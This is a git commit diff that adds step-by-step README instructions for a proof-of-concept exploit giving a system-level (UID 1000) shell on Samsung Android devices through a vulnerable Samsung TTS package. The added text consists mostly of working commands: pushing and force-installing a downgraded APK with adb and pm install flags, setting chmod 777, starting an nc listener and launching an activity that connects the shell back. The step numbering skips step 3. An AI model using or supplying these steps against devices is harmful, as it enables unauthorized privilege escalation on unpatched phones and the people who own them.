Update README.md

k0mraid3 · web-flow · commit ce73986a142e · 2023-01-20T08:38:27.000-06:00
--instructions

Signed-off-by: K0mraid3 &lt;62849592+k0mraid3@users.noreply.github.com&gt;
diff --git a/README.md b/README.md
@@ -3,3 +3,13 @@
 As seen on XDA https://forum.xda-developers.com/t/system-shell-exploit-all-samsung-mobile-devices-no-bl-unlock-required.4543071/
 
 If you just need this prebuilt, see this repo https://github.com/k0mraid3/K0mraid3s-System-Shell
+
+This PoC Should point at localhost port 9997, so nc -lp 9997 into it once built. 
+
+Step 1 - Install the included "komraids_POC_V1.6.apk" to the device, then push the included "samsungTTSVULN2.apk" to /data/local/tmp (adb push samsungTTSVULN2.apk /data/local/tmp) -> Chmod 777 /data/local/tmp/samsungTTSVULN2.apk >>> I advice disabling all battery optimizations for Samsung TTS and Shell, otherwise, it cuts off the shell from time to time.
+
+Step 2 - Make sure ADB is on, Connected and authorized and all power saving is off (as mentioned above) Reboot device.
+
+Step 4 - When device reboots, run this command from ADB. adb shell pm install -r -d -f -g --full --install-reason 3 --enable-rollback /data/local/tmp/samsungTTSVULN2.apk ---> it will return "Success" when done.
+
+Step 5 - Now, open two shells, in the first, do nc -lp 9997 & in the second, do am start -n com.samsung.SMT/.gui.DownloadList -> Look back at the first shell., it should have opened into a new system (UID 1000) shell.
